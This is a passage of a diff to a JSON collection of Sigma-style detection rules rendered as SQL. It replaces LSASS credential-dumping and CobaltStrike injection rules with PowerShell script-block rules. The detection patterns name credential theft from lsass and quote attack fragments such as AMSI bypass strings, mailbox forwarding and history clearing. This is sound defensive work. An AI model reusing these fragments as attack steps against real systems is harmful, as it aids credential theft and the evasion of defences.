(((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "status": "test", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "status": "test", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "status": "experimental", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' 